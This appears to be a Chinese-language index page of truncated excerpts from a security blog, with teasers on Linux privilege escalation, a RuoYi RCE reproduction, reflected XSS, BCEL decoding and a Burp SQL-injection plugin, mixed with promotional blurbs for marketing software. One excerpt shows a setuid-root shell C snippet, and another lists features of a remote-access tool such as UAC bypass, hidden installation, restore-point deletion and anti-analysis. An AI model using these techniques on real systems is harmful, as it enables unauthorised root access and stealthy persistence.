d 在我们攻防当中，常常会碰到 linux 机器，拿到之后为了避免发现 低权限升高权限 创建一个 c 文件 #include <stdio.h> int main() { setuid(0); system('/bin/bash'); return 0; } #include...

jango项目 示例开源项目：DjangoBlog 项目地址：https://gitee.com/lylinux/DjangoBlog 使用的Python环境：Python3.8.5使用过Python版本3.10、3.9版本是不支持这个项目的，如是测试建议使用3.8....

Socinator Dominator Enterprise 免费下载 为什么选择 Socinator Dominator Enterprise？ 在线网络 毫无疑问，基于网络的生活能够接触到世界各地的大量个人。作为一名社交媒体营销人员，您难道...

今天值守的过程中碰到这么一个数据包，出现这么一串东西，之前没特别关注过，百度一波发现是 BCEL 加密 https://github.com/Xd-tl/BCELCode java -jar BCELCode.jar -d 333.txt

0x00 背景 最近项目中发现很多单位都使用了若依二开的系统，而最近若依有个后台计划任务rce的漏洞，比较新，我还没复现过，于是本地搭建一个若依环境复现一下这个漏洞。这个漏洞在4.7.8版本及之...

某反射XSS详情分析

前言 Kali 系统预装了大量的安全工具，可以说是一个安全工具的数据库。在 kali2018.2 系统中就有 600 多个工具，工具如此之多，掌握所有的工具是不现实的，只有需要用的时候再去学习工具的使用...

功能： UAC 漏洞创建计划任务️自动运行客户端以最高权限运行 ?自动启动 =在计算机启动时运行客户端?隐藏安装?系统恢复 = 删除系统还原点?反分析 =保护客户端免受分析 反 Vmw...

什么DROID Pro完全激活 WhatsApp 营销 准备好将客户数量增加 10 倍了吗？这一强大的升级使您的 WhatDroid 盈利能力提高 10 倍 什么是WhatDroid Pro？  WhatDroid 是 Whatsapp 的突破性自动...

xia SQL (瞎注) 本插件仅只插入单引号，没有其他盲注啥的，而且结果返回的结果需要人工介入去判断是否存在注入，如果需要所有注入都测试，请把burp的流量转发到xray。 burp 插件。 在每个参数后...